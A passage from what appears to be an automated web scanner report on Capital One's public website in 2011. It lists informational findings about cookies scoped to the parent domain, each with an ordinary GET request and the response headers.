Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:22 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D1; expires=Thu, 02-Feb-2012 22:12:22 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 17136

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Home
...[SNIP]...

10.82. http://www.capitalone.com/capitaloneplace/disclosures.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /capitaloneplace/disclosures.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /capitaloneplace/disclosures.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:43 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D4; expires=Thu, 02-Feb-2012 22:12:43 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 22852


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Im
...[SNIP]...

10.83. http://www.capitalone.com/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /careers/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /careers/?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_GBLFO_F1_03_T_C1 HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:40 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D4; expires=Thu, 02-Feb-2012 22:12:40 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 35950

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>The l
...[SNIP]...

10.84. http://www.capitalone.com/checking-accounts/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /checking-accounts/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checking-accounts/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:02 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:01 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 23738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...

10.85. http://www.capitalone.com/contactus/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /contactus/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contactus/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:28 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:27 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 28007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact Capital O
...[SNIP]...

10.86. http://www.capitalone.com/contactus/faq.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /contactus/faq.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contactus/faq.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:32 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:32 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 21007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Capital One Frequ
...[SNIP]...

10.87. http://www.capitalone.com/contactus/olbsupport.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /contactus/olbsupport.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contactus/olbsupport.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:34 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:34 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 25849

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Onlin
...[SNIP]...

10.88. http://www.capitalone.com/creditcards/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /creditcards/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /creditcards/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:51 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com
Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: LP_GROUP=test; path=/creditcards/; domain=www.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 31333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...

10.89. http://www.capitalone.com/creditcards/products/browse-all/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /creditcards/products/browse-all/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /creditcards/products/browse-all/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:52 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D7%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com
Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: LP_GROUP=test; path=/creditcards/; domain=www.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 66271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...

10.90. http://www.capitalone.com/creditcards/products/browse-all/popular/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /creditcards/products/browse-all/popular/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /creditcards/products/browse-all/popular/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:51 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D7%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com
Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: LP_GROUP=test; path=/creditcards/; domain=www.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 66647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...

10.91. http://www.capitalone.com/directbanking/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /directbanking/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directbanking/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:19 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D9%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:19 GMT; path=/; domain=.capitalone.com
Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:20 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:19 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 37763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...

10.92. http://www.capitalone.com/directbanking/online-certificates-deposit/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /directbanking/online-certificates-deposit/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directbanking/online-certificates-deposit/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:13 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:12 GMT; path=/; domain=.capitalone.com
Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:13 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:12 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 31412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...

10.93. http://www.capitalone.com/directbanking/online-checking-accounts/interest-online-checking-account/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /directbanking/online-checking-accounts/interest-online-checking-account/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directbanking/online-checking-accounts/interest-online-checking-account/?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_C7_03_T_SP30&itc=CAPITALONE1112G1INTMKTGDF&number=HSRLutmi4O6tZPn79JErD HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:17 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: itc=CAPITALONE1112G1INTMKTGDF; expires=Sun, 03-Apr-2011 22:12:17 GMT; path=/; domain=.capitalone.com
Set-Cookie: dbPhoneNumber=HSRLutmi4O6tZPn79JErD; path=/; domain=.capitalone.com
Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:16 GMT; path=/; domain=.capitalone.com
Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:17 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:17 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 10034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...

10.94. http://www.capitalone.com/directbanking/online-savings-accounts/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /directbanking/online-savings-accounts/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directbanking/online-savings-accounts/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:12 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:11 GMT; path=/; domain=.capitalone.com
Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:12 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:11 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=utf-8
